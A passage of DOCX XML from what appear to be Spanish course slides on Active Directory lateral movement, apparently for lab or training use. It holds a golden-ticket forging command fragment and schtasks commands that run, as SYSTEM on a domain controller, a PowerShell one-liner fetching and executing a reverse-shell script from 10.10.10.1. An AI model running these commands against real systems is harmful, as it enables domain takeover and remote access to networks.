                        <w:t>service:HOST</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="2"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> /rc4:xxxxx /id:500</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4961884B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="234"/>
                        <w:ind w:left="136"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>/groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AC2963" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1511"/>
        </w:tabs>
        <w:spacing w:before="518"/>
        <w:ind w:left="1511" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Programar y ejecutar una tarea en el servidor remoto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBCB613" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61A1BB29" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="18"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487712256" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A45A105" wp14:editId="1C3F0D11">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>611123</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>186912</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="11188065" cy="1282065"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="578"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065" cy="1282065"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1ACC3C79" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="215"/>
                              <w:ind w:left="137"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>schtasks</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> /create /S enterprise-</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>dc.cyberwarfare.corp</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> /SC Weekly /RU "NT Authority\SYSTEM" /TN "lateral" /TR</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2838A4A8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="8" w:line="640" w:lineRule="atLeast"/>
                              <w:ind w:left="137"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>"powershell.exe -c 'iex (New-Object Net.WebClient). DownloadString(''http://10.10.10.1:8000/Invoke- PowerShellTcp.ps1''')'"</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="3A45A105" id="Textbox 578" o:spid="_x0000_s1297" type="#_x0000_t202" style="position:absolute;margin-left:48.1pt;margin-top:14.7pt;width:880.95pt;height:100.95pt;z-index:-1560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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1ACC3C79" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="215"/>
                        <w:ind w:left="137"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>schtasks</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> /create /S enterprise-</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>dc.cyberwarfare.corp</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> /SC Weekly /RU "NT Authority\SYSTEM" /TN "lateral" /TR</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2838A4A8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="8" w:line="640" w:lineRule="atLeast"/>
                        <w:ind w:left="137"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>"powershell.exe -c 'iex (New-Object Net.WebClient). DownloadString(''http://10.10.10.1:8000/Invoke- PowerShellTcp.ps1''')'"</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1495FFF2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5988978B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="682A84EA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4239E18B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="418E77D9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="1" w:line="49" w:lineRule="exact"/>
        <w:ind w:right="1463"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15853568" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39E50D42" wp14:editId="233A6CC7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2584704</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-424862</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6943725" cy="443865"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="579" name="Text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443865"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5C1F0953" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="55"/>
                              <w:ind w:left="261"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>schtasks</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> /Run /S enterprise-</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>dc.cyberwarfare.corp</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> /TN "</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>STCheck</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>"</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="39E50D42" id="Textbox 579" o:spid="_x0000_s1298" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:203.5pt;margin-top:-33.45pt;width:546.75pt;height:34.95pt;z-index:15853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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5C1F0953" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="55"/>
                        <w:ind w:left="261"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>schtasks</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> /Run /S enterprise-</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>dc.cyberwarfare.corp</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> /TN "</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>STCheck</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>"</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="888888"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>167</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11989E52" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:spacing w:line="49" w:lineRule="exact"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId291"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="280" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26FE6524" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="087AD625" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B760887" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A322100" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6028BD83" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="177"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15FB337E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="3256"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="136BD2EE" wp14:editId="2A87B6A0">
                <wp:extent cx="8056245" cy="3014980"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>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6245" cy="3014980"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="B34512"/>
                        </a:solidFill>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="29E7F030" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="11"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="120"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="41F629BE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:ind w:left="3015"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri Light"/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="120"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri Light"/>
                                <w:color w:val="FFFFFF"/>
                                <w:sz w:val="120"/>
                              </w:rPr>
                              <w:t>5. ESTUDIO DE CASO</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="136BD2EE" id="Textbox 582" o:spid="_x0000_s1299" type="#_x0000_t202" style="width:634.35pt;height:2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" fillcolor="#b34512" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="29E7F030" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="11"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="120"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="41F629BE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:ind w:left="3015"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri Light"/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="120"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri Light"/>
                          <w:color w:val="FFFFFF"/>
                          <w:sz w:val="120"/>
                        </w:rPr>
                        <w:t>5. ESTUDIO DE CASO</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F327A3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId292"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1220" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:pgNumType w:start="168"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B448143" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15854592" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3375DA83" wp14:editId="4B4CAAE2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="1193800"/>
                <wp:effectExtent l="0" t="0" r="0" b="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1193800"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="12192000" cy="1193800"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="584" name="Graphic 584"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1193800"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="12192000" h="1193800">
                                <a:moveTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1193291"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="1193291"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="B34512"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="585" name="Textbox 585"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1193800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3A88B835" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="422"/>
                                <w:ind w:left="11"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
